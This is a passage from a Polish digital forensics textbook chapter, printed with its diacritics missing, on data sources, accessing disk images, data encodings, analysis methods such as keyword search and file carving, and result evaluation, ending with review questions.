Aplikacja do tej kategorii zaliczaj si wszystkie artefakty specyficzne dla aplikacji (np. bufor
przegldarki internetowej, pliki baz danych, dzienniki serwera sieciowego, preferencje i dzienniki
aplikacji do czatowania, pliki danych klientw e-mail itd.). Pamitaj, e wiele artefaktw dla
danego programu przypomina podobne w rnych systemach operacyjnych. Ponadto podczas
dezinstalacji lub usuwania programw w inny sposb w systemie pozostaje wiele rnych
ladw. Zasoby artefaktw aplikacji s zazwyczaj bardzo bogate, ale te wysoce wyspecjalizowane.
W ksikach i innych publikacjach powiconych tematowi aplikacji najczciej mona znale
opisy dotyczce jednej kategorii, czasami nawet konkretnego produktu. Zalecamy wic przyjrzenie
si aplikacjom wystpujcym we wasnym rodowisku i poeksperymentowanie z nimi.
Dane uytkownika jeli przedmiotem ledztwa jest uytkownik lub grupa uytkownikw,
trzeba wiedzie, gdzie przechowywane s ich dane. Kady uytkownik przechowuje jakie
dane w systemie, ktrego uywa na co dzie, ale wartociowe informacje mog te znajdowa
si w innych systemach w rodowisku. Przykadowo poczta e-mail, dokumenty, arkusze
kalkulacyjne oraz kod rdowy mog by przechowywane w centralnych magazynach.
Naley uwzgldni te pozycje na swojej licie potencjalnych rde informacji.
Usugi sieciowe i oprzyrzdowanie prawie kada organizacja ma wewntrzne usugi
sieciowe lub oprzyrzdowanie. Czasami mog by zapomniane, ale nawet powszechnie
wykorzystywane usugi, takie jak DHCP, DNS i serwery proxy, mog stanowi kluczowe
rdo informacji w ledztwie. Wyobra sobie, e trzeba sprawdzi, do ktrego komputera
nastpio wamanie, jeli dany jest tylko adres IP, a w rodowisku dziaa usuga DHCP
z du czstotliwoci rotacji dzieraw. Ponadto typowe oprzyrzdowanie, takie jak dane
przepyww sieciowych, systemy IDS/IPS i zapory sieciowe, take czsto ma due znaczenie
dla powodzenia ledztwa. Te rda rwnie naley doda do swojej listy.
DOSTP DO ZDOBYTYCH DANYCH

Jedn z pierwszych trudnoci, jakie mona spotka po zdobyciu danych do analizy, jest sposb
dostpu do informacji. W tym kontekcie sowo dostp oznacza doprowadzenie danych
do stanu, w ktrym mona je analizowa. Dane mog by zaszyfrowane, skompresowane,
zakodowane, zapisane w niestandardowym formacie, na oryginalnych dyskach twardych, zapisane
w obrazach dyskw twardych, dostarczone w klonach dyskw twardych, a nawet zwyczajnie
uszkodzone. Wprawdzie tre tego podrozdziau nie wie si bezporednio z metodami analizy,
ale nie da si przeprowadzi skutecznych analiz, nie wiedzc dokadnie, na co si patrzy. W tym
podrozdziale chcemy dostarczy Ci troch informacji w tym zakresie.
Ostrzeenie Nie zapomnij, aby z danymi otrzymanymi jako dowody postpowa wg przyjtych w organizacji
procedur. W tym celu dane odpowiednio udokumentuj i zabezpiecz przed modyfikacj.
Zaniechanie tego obowizku moe utrudni ledztwo lub mie jeszcze gorsze skutki.
Na samym pocztku naley sprawdzi, co dokadnie si ma. Moe si to wydawa banalne,

ale w rzeczywistoci bywa rnie. Jeli wygenerujesz lub zbierzesz dane samodzielnie, pewnie
bdzie Ci atwiej. Jeli jednak otrzymasz dane od kogo innego, musisz dokadnie wypyta,
co otrzymujesz. Jeeli tego nie zrobisz, moe by Ci trudno wszystko pniej rozszyfrowa.
Obrazy dyskw
Rozwamy nastpujc potencjaln sytuacj. Wyobra sobie, i kto z Twojej organizacji mwi,
e dostarczy Ci kopi dysku twardego z pewnego systemu do analizy pod ktem ladw zamania
zabezpiecze. Nastpnego dnia otrzymujesz ten dysk od kuriera. Otwierasz paczk, podczasz
dysk do swojego komputera za porednictwem sprztowej blokady zapisu i rozpoczynasz analiz.
Chwil pniej tkwisz w martwym punkcie, poniewa Twoje narzdzia nie rozpoznaj systemu
plikw. Co gorsza, masz wraenie, e jest peen mieci wyglda to na losowe znaki. Dochodzisz
wic do wniosku, e zawarto dysku musi by zaszyfrowana. Nie wiesz jednak, w jaki sposb oraz
nie masz hasa ani adnych innych potrzebnych do rozszyfrowania danych informacji. Prbujesz
wic skontaktowa si z osob, od ktrej dostae dysk, aby dowiedzie si czego wicej. Niestety
osoba ta jest na wakacjach, a wsppracownicy nie wiedz, skd pochodzi dysk. W tym momencie
jeste w kropce i nie moesz przeprowadzi analizy.
Oto mora: odbierajc od kogo obcego dane, zawsze pytaj o pewne rzeczy. Otrzymane
informacje umoliwi wykonanie pracy. W sytuacji opisanej w poprzednim akapicie naleaoby
spyta: Co to znaczy kopia dysku twardego z pewnego systemu?. Chodzi o to, e stwierdzenie to
jest bardzo niejednoznaczne. Naley je rozoy na czci i zada takie pytania, dziki ktrym
bdzie wiadomo, co to za kopia, dysk twardy i system. Jaki to rodzaj kopii? Pewnie jest to
kopia logiczna, ale rwnie dobrze moe to by obraz wykonany na potrzeby ledztwa, a nawet klon.
W zalenoci od celu analizy, format moe by nie do przyjcia lub mie wady, z ktrymi trzeba
bdzie sobie jako poradzi. Jeeli kopia to naprawd obraz, naley spyta, w jakim formacie
jest ten obraz. Ponadto otrzymujc kopi dysku twardego, naley spyta, czy jego zawarto jest
zaszyfrowana i jeli tak, to w jaki sposb mona si do niej dosta. Niektre narzdzia do analizy
ledczej zapewniaj dostp do dyskw zaszyfrowanych za pomoc popularnych algorytmw.
Czasami potrzebne s dodatkowe biblioteki lub pliki od administratorw systemu. Jeeli jaki
rodzaj szyfrowania nie jest obsugiwany, moe by konieczne poszukanie innych rozwiza.
W kocu naley te dopyta o informacje o samym systemie. Czy jest to komputer stacjonarny,
laptop, serwer, czy jeszcze co innego? Jakiej marki jest to urzdzenie i jaki model? Jaka wersja
systemu operacyjnego jest na nim zainstalowana i czy dziaa? Jeeli jest to serwer, czy ma macierz
RAID? Jeli tak, to jak gwn funkcj peni? Pytania mona mnoy i s zalene od sytuacji oraz
otrzymywanych odpowiedzi, ale chyba wiesz ju, o co chodzi. Jeli nie zadasz tego typu pyta,
moesz zmarnowa bardzo duo cennego czasu.
Najczciej spotykamy trzy formaty obrazw dyskw: Expert Witness/EnCase (E01),
surowy (DD) oraz pliki dyskw maszyn wirtualnych (VMDK, OVF). Komercyjne pakiety
oprogramowania ledczego, np. EnCase firmy Guidance Software, standardowo obsuguj te
wszystkie formaty. Dziki temu nie trzeba ich konwertowa, aby dosta si do danych. Jeli
natomiast nie dysponujesz patnym pakietem programw, moesz wykona konwersj lub
skorzysta z dodatkowych narzdzi umoliwiajcych interpretacj albo przeprowadzajcych
konwersj na bieco. Przyjrzymy si nieco bliej technikom pracy z obrazami dyskw.
Wikszo duych organizacji posiada licencj na przynajmniej jedno komercyjne narzdzie
ledcze. Jeeli jest to program EnCase, otwarcie obrazu dysku twardego nie stanowi adnego
problemu. Pliki E01 i VMDK mona otwiera przez przecignicie ich do okna programu EnCase
v6 (po rozpoczciu nowej sprawy). Jeeli obraz jest w formacie DD, trzeba go skonfigurowa
za pomoc opcji File/Add Raw Image (plik/dodaj surowy obraz). Inn zalet niektrych
komercyjnych narzdzi jest obsuga rnych metod szyfrowania caych dyskw. Moesz np.
otrzyma obraz dysku twardego zaszyfrowany metod Credent. Jeli masz produkt w rodzaju
EnCase, moesz bezporednio pracowa z takim obrazem, oczywicie pod warunkiem, e
posiadasz potrzebne hasa i pliki kluczy. W ten sposb oszczdzasz sobie koniecznoci szukania
sposobw rozszyfrowania obrazu lub metod dostania si do danych.
Jeeli masz niewielki budet lub po prostu chcesz zminimalizowa koszty, do pracy z obrazami
dyskw moesz te uywa kilku darmowych narzdzi. Przykadowo program FTK Imager firmy
AccessData umoliwia tworzenie, konwertowanie i przegldanie wielu typw obrazw dyskw.
Funkcja przegldania suy gwnie do sprawdzania sensownoci danych lub eksportowania
plikw. Jednak funkcja konwersji jest bardzo przydatna mona doda obraz dysku do programu
FTK Imager, a nastpnie klikn prawym przyciskiem myszy dowd i wybra pozycj Export
(eksportuj). Pojawi si kreator eksportu, w ktrym mona wybra format inny ni oryginalny.
To pozwala na przekonwertowanie obrazu E01 na DD albo DD na E01 lub jakikolwiek inny
format obsugiwany przez program. W Linuksie do montowania obrazw DD mona uywa
programu Filesystem in Userspace (FUSE), a do montowania obrazw E01 mona wykorzystywa
narzdzie libewf.
Jak to wyglda
Opisane w tym rozdziale metody analizy s bezuyteczne, jeli zapomni si o jednym prostym
fakcie, e istnieje nieskoczona liczba reprezentacji danych. Uwzgldniajc takie czynniki jak
kodowanie znakw, kompresja, szyfrowanie, kodowanie danych, strefy czasowe, jzyki i inne
kwestie lokalizacyjne, mona stwierdzi, e szukanie zagroe w niektrych przypadkach jest
jak szukanie igy w stogu siana. Co np. maj ze sob wsplnego ponisze acuchy znakw:
"dGhlIHBhc3N3b3JkIGlzIHNvbHZlY3JpbWU="
":=&AE('!A<W-W;W)D(&ES('-O;'9E8W)I;64`"
"5e0f4784789c4705fa4832aa69d41499"
Na pierwszy rzut oka wydaje si, e napisy te nie maj adnego zwizku. A jednak wszystkie
powstay z jednego acucha the password is solvecrime (haso to solvecrime). Pierwszy to kod
base64, drugi to kod UU, a trzeci to skrt MD5. Prowadzcy ledztwo powinien wiedzie, e
wszystkie informacje s warstwowe, jak w tym prostym przykadzie. Aby skutecznie znajdowa to,
czego si szuka, naley wiedzie, gdzie znajduj si warstwy, jak wygldaj i jak si z nimi obchodzi.
To, e informacje skadaj si z warstw, nie jest pewnie dla Ciebie niczym nowym, poniewa
pojcie warstw jest w komputerach wszechobecne. Nowe moe by to, w jaki sposb te warstwy
wpywaj na Twoje analizy. Nawet sprawdzenie, czy gdzie na dysku twardym zapisano nazwisko
albo numer karty kredytowej, moe okaza si skomplikowanym zadaniem. Istnieje wiele rodzajw
kodowania znakw, metod kodowania, kompresji i szyfrowania oraz rnych wasnociowych struktur
i formatw danych. Kiedy badalimy dziennik debugowania terminalu POS. Kto stwierdzi
na pimie, e w dzienniku tym nie ma pewnego numeru karty kredytowej. Przeszukalimy ten
dziennik sami i znalelimy ten numer w zaszyfrowanej formie. Jak to moliwe?
Podczas pobienego przegldu zawartoci pliku zauwaylimy, e sposb jego formatowania
odbiega od typowego formatu dokumentu tekstowego. Bardziej przypomina tre przedstawian
przez edytory szesnastkowe. Programy te najczciej wywietlaj szesnastkowe przesunicie po
lewej stronie, dane binarne w formie szesnastkowej porodku oraz konwersj ASCII po prawej.
Plik, o ktrym mwimy, wyglda wanie jak zrzut zawartoci z edytora szesnastkowego, co wida
na nastpnej stronie.
W edytorze tekstowym byo wida dokadnie to, co na tym rysunku. Ze wzgldu na sposb
prezentacji danych, podczas przeszukiwania tej treci za pomoc zwykej funkcji wyszukiwania
atwo mona co przeoczy. Na rysunku wida, e plik zawiera numer karty kredytowej
4444555566667777, tylko e jest on podzielony na dwie czci i dwie linijki, midzy ktrymi
wystpuje inny tekst. Poniewa typowe narzdzia wyszukiwania nie rozpoznaj elementw
prezentacji danych, naszym poprzednikom nie udao si znale tego numeru. Trzeba byo
wyznaczy czowieka do przejrzenia danych, rozszyfrowania sposobu ich formatowania
i opracowania odpowiedniej metody wyszukiwania. W tym przypadku napisalimy skrypt
wczytujcy dane rdowe i zmieniajcy formatowanie. Skrypt ten zlikwidowa kolumny wartoci
szesnastkowych i przeformatowa kolumny ASCII tak, aby znaki znajdujce si po obu stronach
separatorw (czniki) byy poczone w jedn lini.
Zastanawiajc si nad moliwym wygldem swoich danych, nie zapominaj te o lokalizacji.

W rnych miejscach wiata stosowane s odmienne rodzaje reprezentacji dat, godzin, liczb, znakw
i innych informacji. Nawet w obrbie jednej lokalizacji mog wystpowa rnice. Jeli np. zajrzysz
do dziennikw w swoim komputerze, zapewne znajdziesz daty w przynajmniej szeciu formatach.
ANALIZA DANYCH
Po zdefiniowaniu celw i wybraniu rde danych mona zacz wybiera metod dziaania.
Przejrzyj swoje pytania dotyczce ledztwa i utwrz wstpn list rde danych, ktre bd
potrzebne do znalezienia odpowiedzi. Czasami bezporednie dowody udaje si znale
w niespodziewanych miejscach, dlatego zawsze bierz pod uwag wszystkie cztery kategorie,
ktre wymienilimy wczeniej. Przyjrzymy si przykadowej hipotetycznej sytuacji.
Uwaga Caa ta praca sporzdzanie listy celw, tworzenie listy rde danych oraz dokumentowanie
techniki, ktrej planuje si uy wydaje si niepotrzebna. I pewnie tak jest, jeli kto pracuje
sam przy zaledwie kilku systemach. Jednak w duych przedsiwziciach, angaujcych wiele
zespow, takie podejcie jest najlepsze. Dokumentacja i listy pomagaj utrzyma porzdek
w ledztwie, umoliwiaj rozwizywanie wielu zada naraz oraz dostarczaj przydatnych danych
statystycznych na spotkania ze klientami.
Zarys proponowanej metody dziaania

Powiedzmy, e mamy sprawdzi, czy doszo do kradziey danych. Jest to bardzo szeroko
sformuowany cel. Hakerzy czasami ogaszaj, co zrobili, i mog to robi publicznie lub prywatnie.
Takie informacje s dobrymi tropami, ale pamitaj, e mog by czciowo lub cakowicie faszywe.
Nie majc wicej konkretw, mona rozpocz ledztwo od poszukania dwch rodzajw dowodw:
anomalii sieciowych,
typowych ladw kradziey danych na hostach.
Nastpnym krokiem jest zastanowienie si, ktre rda danych mog zawiera tego typu lady.
Szukanie anomalii w sieci mona zacz od przyjrzenia si danym przepywajcym przez
punkty wyjciowe. Moe uda si zauway co niezwykego, np. transfer nietypowo duej iloci
danych do internetu majcy miejsce w zeszym miesicu albo nietypowy poziom ruchu przez
okrelone protokoy lub porty. Mona dry takie odkrycia i zobaczy, do czego nas zaprowadz.
Ewentualnie mona zbada dzienniki proxy, DNS i zapory sieciowej albo innych przyrzdw
sieciowych pod ktem anomalii i podda dokadnej analizie wszystko, co wyda si podejrzane.
W ten sposb mona np. wykry du liczb nieudanych prb logowania.
Jednoczenie warto poszuka w systemach nalecych do rodowiska ladw kradziey danych.
Bardzo pomocna w takim przypadku jest znajomo metod stosowanych przez hakera, ale istniej
te oglne artefakty, ktre mona rozpozna. Oto kilka przykadw:
nienormalna aktywno uytkownikw,
przypadki logowania poza normalnymi godzinami pracy,
nienormalne czasy trwania pocze,
niespodziewane rda pocze (np. zdalne sesje midzy stacj robocz i serwerem),
okresy nienormalnie wysokiego poziomu wykorzystania procesora lub dysku
(typowe dla kompresji danych),
artefakty plikowe zwizane z wykorzystywaniem znanych narzdzie do kompresji danych,
niedawno zainstalowane lub zmodyfikowane usugi albo obecno w systemie innych
mechanizmw utrwalania danych.
Jeeli wiesz, jak haker dziaa w rodowisku, rwnie we pod uwag wymienione punkty.
Innym typowym zadaniem dla ledczych jest sprawdzenie, czy w systemie znajduje si jakie
szkodliwe oprogramowanie. Raczej nie da si przejrze wszystkich kombinacji bajtw i moliwych
miejsc przechowywania wirusw na dysku twardym. Nie da si wic dowie, e w systemie nie ma
szkodliwych programw. Dlatego naley sporzdzi list czynnoci, ktrych wykonanie pozwoli
zyska wysoki stopie pewnoci, e system jest czysty. Poniej znajduje si przykadowa lista dla
przedstawionej sytuacji.
Zbadaj tropy pocztkowe. Jeli np. dane do tego zachcaj, przejrzyj aktywno systemow
dla tego dnia. Gdy wiesz, e zaangaowane s okrelone pliki, poszukaj ich.
Przyjrzyj si automatycznie uruchamianym programom.
Sprawd integralno systemowych plikw binarnych.
Sporzd list znanych artefaktw infekcji i poszukaj ich.

Przeskanuj system programem antywirusowym.
Naley wykona wszystkie te czynnoci, zanotowa wyniki oraz podeprze si nimi przy
wydawaniu opinii na temat moliwej obecnoci szkodliwych programw w systemie. Pamitaj, e
plik sam w sobie nie musi by szkodliwy, aby kto wykorzystywa go do niecnych celw. Take legalne
narzdzia i programy systemowe mog by w niektrych przypadkach podejrzane. Jeli np. znajdziesz
kopi programu cmd.exe w katalogu innym ni Windows/System32, koniecznie zbadaj t spraw.
Kolejn czynnoci jest opisanie kilku konkretnych zada, ktre postanowisz wykona. Uprzednio
jednak konieczne moe by dokadniejsze sprecyzowanie, na czym dana czynno ma polega.
Przykadowo jak podejdziesz do szukania nienormalnych godzin logowania si uytkownikw?
Moe umiesz zautomatyzowa ten proces, a moe bdziesz musia opracowa specjaln technik
lub przeprowadzi procedur rcznie? Ponadto zawsze naley uwzgldni kilka czynnikw,
takich jak objto danych, czas trwania procesu, osoby, ktre mog zosta oddelegowane do tej
pracy, oraz to, jak dua jest szansa, e dana czynno pozwoli znale odpowied na pytanie.
Przyjrzymy si dokadniej, jakie s kategorie czynnoci, ktre mona podj w ramach analizy.
Wybr metod
W odniesieniu do rnych systemw operacyjnych, obrazw dyskw, dziennikw i innych danych
stosuje si rne powszechnie znane metody analizy. Niektre s skuteczne, gdy wiadomo, czego
si szuka, a inne w przeciwnym przypadku. Cho szczegy implementacyjne mog si zmienia,
metody te nie s zwizane z adn konkretn technologi; oto one:
wykorzystanie zasobw zewntrznych,
inspekcja manualna,
wykorzystanie specjalistycznych narzdzi,
minimalizacja danych przez ich posortowanie i przefiltrowanie,
analiza statystyczna,
poszukiwanie sw kluczowych,
file carving.
Cho np. artefakty NTFS s w wikszoci specyficzne dla danego systemu plikw, oglna
koncepcja identyfikowania i wykorzystywania artefaktw systemu plikw w ledztwie ju nie.
Tre tej ksiki jest skonstruowana na bazie tej koncepcji. Warto si nad tym zastanowi. Jeeli
planujesz bada artefakty popularnej przegldarki internetowej, istnieje szansa, e technologia,
na ktrej aplikacja ta jest oparta, pozostawi przynajmniej troch ladw niezalenych od systemu
operacyjnego. Artefakty te mog znajdowa si w rnych miejscach lub mie rne nazwy,
ale same informacje s zazwyczaj takie same. Dobre narzdzia ledcze, techniki i dokumentacja
uwzgldniaj takie czynniki i umoliwiaj przeprowadzanie takich samych procesw w rnych
rodowiskach. Przyjrzymy si dokadniej wymienionym metodom analizy.
Zachcanie Ci do korzystania z zewntrznych zasobw lub prac innych osb moe wyglda
jak namawianie do oszukiwania. Jeli jednak nie masz czasu, aby dan sytuacj potraktowa jak
trening, naszym zdaniem nie ma nic zego w wykorzystywaniu narzdzi innych osb. Jeeli nie moesz
szybko rozwiza sprawy, poniewa przytacza Ci ogromna ilo danych, a czas goni, skorzystaj
z jakiejkolwiek sensownej i akceptowalnej metody, ktra pozwoli znale odpowiedzi na pytania.
W tego rodzaju sytuacji sigamy do takich zasobw jak znane pliki baz danych, wyszukiwarki,
magazyny wiedzy, fora internetowe, narzdzia automatyczne, wsppracownicy i koledzy. Jeli nie masz
pewnoci, co oznacza dany plik, oblicz jego skrt MD5 i poszukaj go w znanej bazie danych plikw,
np. NSRL (ang. National Software Reference Library), Bit9 lub popularnej wyszukiwarce internetowej.
Gdy napotkasz domen i chcesz wiedzie, czy ma zwizek ze szkodliwym oprogramowaniem,
przeszukaj zasoby portali firm od zabezpiecze komputerowych. I nie wahaj si prosi o pomoc.
Przyjmowanie zaoe i opnianie procesu ledztwa jest niekorzystne dla organizacji.
Innym wartym rozwaenia sposobem dziaania jest samodzielne przejrzenie danych.
Czasami jest ich mao, wic nie ma problemu. W takich przypadkach dobrym pomysem moe
by przejrzenie caoci. Jeszcze w 2012 roku prowadzilimy ledztwo, w ramach ktrego jednym
z naszych zada byo przeanalizowanie zawartoci kilku dyskietek. W przypadku zbiorw danych
o takich rozmiarach jedynym rozwizaniem jest przeprowadzenie penego przegldu. Wprawdzie
nie zdarza si to czsto, ale trzeba o tym pamita z przynajmniej dwch powodw. Po pierwsze,
moesz straci mnstwo czasu na szukanie lepszego rozwizania. Po drugie, taka dokadna
analiza daje wiksz pewno dotyczc poprawnoci wynikw. Jeli w danej sytuacji uzasadnione
jest uycie automatu, zawsze dodatkowo samodzielnie sprawdzamy dane, aby zweryfikowa wyniki
otrzymywane innymi sposobami. Wemy np. proces przeznaczony do porwnywania danych
w sprawie dotyczcej naruszenia praw autorskich. W wielu przypadkach kategoryzacja informacji
w zbiorach danych doskonale predysponuje je do automatycznego przetwarzania. Podczas
opracowywania procesu jednoczenie przegldamy cz danych w celach weryfikacyjnych.
Gdy trzeba przetworzy duy zbir danych, pobieramy prbki i samodzielnie je przegldamy.
Naley dokadnie przeanalizowa sytuacj, zanim zdecydujemy si na zastosowanie metod
rcznych, poniewa moe si okaza, e jest to bardzo trudne i czasochonne zadanie. Najczciej
posugujemy si kombinacj kilku metod, np. uycia specjalistycznych narzdzi, sortowania
i filtrowania lub wyszukiwania sw kluczowych. Kilka z tych metod opisujemy poniej.
Firmy, specjalici i naukowcy dziaajcy w dziedzinie reakcji na incydenty bezpieczestwa
komputerowego i informatyki ledczej stworzyli mnstwo specjalistycznych narzdzi pomocnych
w naszej pracy. Znajduj si wrd nich narzdzia do wizualizacji danych, analizy artefaktw
przegldarek, identyfikacji szkodliwego oprogramowania oraz pobierania metadanych z systemu
plikw. Naley zawsze mie pod rk wiele rnych narzdzi, aby skutecznie poradzi sobie w kadej
sytuacji. Czasami w sytuacjach, gdy nie ma dobrych ladw, na pocztek wystarcz bardziej oglne
rozwizania, takie jak programy identyfikujce szkodliwe oprogramowanie. W kolejnych rozdziaach
opisujemy kilka narzdzi i technik, ktre naszym zdaniem warto zna. Kto, kto potrafi dobrze si
nimi posugiwa, moe zaoszczdzi mnstwo czasu. Pamitaj jednak, e bez wzgldu na to, jakiego
narzdzia uywasz, zawsze weryfikuj w jaki sposb otrzymywane wyniki lub przeprowadzaj testy,
aby mie pewno, e wszystko dziaa tak, jak powinno. Posugiwanie si nieprzetestowanymi lub
nieznanymi narzdziami w naszej brany oznacza proszenie si o kopoty.
Nastpn interesujc nas kategori jest minimalizacja danych za pomoc ich sortowania
i filtrowania. Podczas przegldania metadanych, np. kompletnych list plikw, stwierdzamy, e
wikszo danych jest bezuyteczna. W systemie mog znajdowa si setki tysicy plikw i jest
niewielka szansa na rczne przejrzenie kadego z nich. W wikszoci przypadkw dla ledztwa
wana jest tylko maa cz metadanych, a jeli ich objto jest bardzo dua, odsianie tego, co
nieprzydatne, moe by trudne. W takich przypadkach dobrym pomysem moe by posortowanie
i przefiltrowanie danych w celu wydobycia okrelonych dat, katalogw, nazw plikw i innych atrybutw.
Oczywicie sortowa i filtrowa mona nie tylko metadane. Procesom tym mona poddawa wikszo
danych strukturalnych, czyli takich, ktre s zapisane w formacie nadajcym si do analizy skadniowej.
Z drugiej strony proces filtrowania i sortowania bardzo duych zbiorw danych moe by czasochonny
i kopotliwy. Najlepiej czynnoci te wykonywa, gdy ma si jakie oglne tropy lub zna si jakie
waciwoci danych, ktre mog pomc w znalezieniu tego, czego si szuka. Jeeli sortowanie
i filtrowanie nie pomog, mona sprbowa metod z kategorii analizy statystycznej.
Analiz statystyczn stosuje si zazwyczaj wtedy, kiedy nie wiadomo dokadnie, czego lub jak szuka.
Metodami tymi mona wykry rne wzorce i anomalie, ktre dla czowieka byyby trudne lub niemoliwe
do zauwaenia. Jeli np. trzeba przejrze dzienniki serwerowe o duej objtoci w celu wykrycia
potencjalnej szkodliwej aktywnoci, dobrym pomysem moe by wykorzystanie narzdzia do
analizy dziennikw. Wikszo narzdzi tego typu ma funkcje automatycznej analizy skadniowej pl,
wyszukiwania danych geolokalizacyjnych, indeksowania oraz generowania statystyk i podsumowa na
rne sposoby. Po zakoczeniu przetwarzania mona dostrzec pewne wzorce w statystykach da
do serwera. Przykadowo poniej wida wynik analizy dziennikw serwera Apache w narzdziu Sawmill.
Drc te statystyki, odkryjesz, e pewnego dnia zostao wysanych wiele da POST.

Moesz je zbada dokadniej, aby sprawdzi, czy byy szkodliwe. Prawdopodobnie innego dnia
doszo do transferu nietypowo duej iloci informacji. Jeli przyjrzysz si przesyanym danym,
moe odkryjesz co wanego dla ledztwa. Podczas przegldania wynikw analizy nie daj si
wprowadzi w bd. Wiele anomalii to faszywe alarmy lub nieczste, ale jednak legalne zdarzenia
albo naprawd lady aktywnoci uytkownikw o zych zamiarach, ale nie tych, ktrych szukasz.
Wyszukiwanie acuchw i sw kluczowych to podstawowe metody analityczne stosowane
przez ledczych od powstania dziedziny informatyki ledczej. Polega to na utworzeniu listy sw
kluczowych (acuchw) sucych do przeszukiwania materiau dowodowego (plikw) w celu
znalezienia danych mogcych pomc w uzyskaniu odpowiedzi na pytania postawione w ledztwie.
Jest to jedna z metod, ktre same si nasuwaj, gdy trzeba znale pewne cigi znakw. Jednak
z jej stosowaniem wie si kilka niuansw. Jak napisalimy wczeniej, istniej pewne czynniki,
np. kodowanie lub rodzaj formatowania, uniemoliwiajce skuteczne przeprowadzenie
wyszukiwania acuchw. Dlatego analityk musi wiedzie, jak szukany acuch jest
reprezentowany w przeszukiwanym zbiorze danych.
Na podstawie koncepcji wyszukiwania sw kluczowych dawno temu kto wpad na pomys,
aby podczas badania dysku przeszukiwa te przestrze nieprzydzielon i wolne miejsce.
Przeszukiwanie tych miejsc otworzyo przed ledczymi nowe moliwoci zdobywania dowodw.
W przestrzeni nieprzydzielonej znajduj si usunite pliki, ktre czsto stanowi bardzo wane
rdo materiau dowodowego. Natomiast wolne miejsce w pliku (ang. file slack) to przestrze
dzielca logiczny koniec pliku i koniec jednostki alokacji. Z technicznego punktu widzenia wolne
miejsce jest wic przydzielone (nie moe zosta wykorzystane przez inny plik), ale moe zawiera
dane nalece do poprzedniego pliku lub z jakiego miejsca w pamici albo jedne i drugie.
Uytkownik z reguy nie ma kontroli nad zawartoci wolnych miejsc, przez co w obszarach
tych mog znajdowa si lady jego aktywnoci porozrzucane po caym dysku. Dlatego naley
posugiwa si narzdziami i procedurami pozwalajcymi na przeszukiwanie take przestrzeni
nieprzydzielonej i miejsca wolnego.
Ostatnia interesujca nas kategoria to file carving. Technika ta czy aspekty kilku innych
metod. Polega na wyszukiwaniu pewnej niepowtarzalnej sekwencji bajtw odpowiadajcej
nagwkowi lub kilku pierwszym bajtom pliku. Wikszo powszechnie uywanych formatw
plikw ma standardowe nagwki oznaczajce pocztek pliku, a niektre maj te standardowe
stopki oznaczajce koniec pliku. Poniej pokazano przykad nagwka pliku graficznego JPEG.
W przypadku tego formatu najczciej powtarza si dziesi pierwszych bajtw pliku.

Naszym celem jest znalezienie wszystkich egzemplarzy danego typu plikw w rdle i wydobycie
ich stamtd, by podda je analizie. Umoliwia to wikszo komercyjnych narzdzi ledczych
i cz darmowych, np. Foremost.
W INTERNECIE
Foremost foremost.sourceforge.net
W metodzie tej nie maj znaczenia rozszerzenia plikw, nazwy plikw, to, czy plik jest aktywny,
czy usunity, ani nawet same pliki. Jest to bardzo skuteczna technika identyfikacji i odzyskiwania
plikw wybranego rodzaju. Nie zawsze jednak interesuj nas cae pliki. Jeli na format pliku
skadaj si bez wtpliwoci identyfikowalne osobne rekordy, mona sprbowa pobra tylko
interesujce nas rekordy. Sposb dziaania opiera si na znalezieniu rekordw na podstawie wiedzy
o nagwku i formacie pliku. Jeli plik jest czciowo nadpisany, pofragmentowany lub analizowany
jest obraz pamici albo przestrze wymiany, szukanie rekordw zamiast caych plikw moe da
bardzo dobre rezultaty.
EWALUACJA WYNIKW
Wanym elementem procesu analizy jest ewaluacja wynikw i ewentualne poprawienie
stosowanych metod. Ocena przebiega dwuetapowo.
Wyniki naley ocenia okresowo podczas trwania procesu analizy.
Gdy proces dobiegnie koca, naley wykona ewaluacj stopnia, w jakim jego wyniki
pozwalaj odpowiedzie na pytania postawione w ledztwie.
Nie czekaj ze sprawdzaniem wynikw na zakoczenie dugiego procesu analizy, poniewa
w jego trakcie wiele rzeczy moe pj nie po myli. Przykadowo sowo kluczowe, ktre wydaje si
niepowtarzalne, moe wystpowa w zbiorze danych bardzo czsto, przez co powstanie tak dua
liczba faszywych alarmw, e wyniki bd bezuyteczne. Moesz te prbowa wykry pliki ZIP
i okae si, e s ich miliony, lub te w drug stron szukasz sowa kluczowego, ktre Twoim
zdaniem powinno pojawi si kilka razy, a po szeciu godzinach analizy okazuje si, e nie znaleziono
ani jednego. Baczenie na takie przypadki, czasami nazywane testowaniem sensownoci (ang.
sanity checking), to jedno z najwaniejszych zada analityka. Przyczyn niepowodzenia moe by
prosty bd w konfiguracji parametrw procesu, np. literwka. Czasami problem stanowi samo
podejcie do zadania. Lepiej dowiedzie si o tym jak najszybciej, aby szybko co poprawi. Sami
te zazwyczaj przegldamy pocztkowe wyniki, aby sprawdzi, czy wygldaj na prawidowe.
Jeli proces analizy dobiegnie koca bez problemw, otrzymasz wyniki do przejrzenia.
Przed przystpieniem do ich przegldania przypomnij sobie pytania postawione w ledztwie.
Badaj rezultaty pod ich ktem i zbieraj dowody potwierdzajce jak tez. Czasami wyniki s
niejednoznaczne albo nie ma ich w ogle (np. nie znaleziono ani jednego wystpienia szukanego
sowa). W takich przypadkach mona zmieni co w sowie kluczowym, ale nie zawsze jest to
moliwe. Ponadto pamitaj, e brak wyniku nie stanowi dowodu, e co nigdy nie istniao wiadomo
tylko, e nie istnieje teraz. Jeli otrzymane wyniki nie s pomocne, mona sprbowa innej metody
lub przeszuka inne rdo.
I CO Z TEGO
Nie da si by dobrym informatykiem ledczym, nie znajc rodzajw danych, narzdzi i metod
analizy. Niestety bardzo czsto spotykamy analitykw nierozumiejcych danych, ktre analizuj,
nierozumiejcych (ani nietestujcych) uywanych przez siebie narzdzi oraz niewiedzcych, czy
stosowana przez nich metoda daje jakkolwiek nadziej na otrzymanie prawidowych wynikw.
Dlatego zalecamy traktowanie wynikw otrzymywanych z narzdzi i po przeprowadzeniu
procesw ze sceptycyzmem. Zawsze zastanawiaj si, czy na pewno stosujesz waciwe podejcie,
poniewa Twj przeciwnik prawie na pewno si nie pomyli.
PYTANIA
1. Na podstawie lektury tego rozdziau okrel, co Twoim zdaniem jest najtrudniejsze w pracy
analityka? Uzasadnij swoj odpowied.
2. Jakby postpi w nastpujcej sytuacji? Klient mwi Ci, e jednym z najwaniejszych celw
jest udowodnienie, i w czasie analizy w systemie nie byo pliku o okrelonym skrcie MD5.
Masz niedawno utworzony obraz dysku z tego systemu.
3. Wymie cztery powszechnie uywane rodzaje kodowania tekstu. Jak przeprowadziby
skuteczne wyszukiwanie sw kluczowych, gdyby dane rdowe byy zakodowane wanie
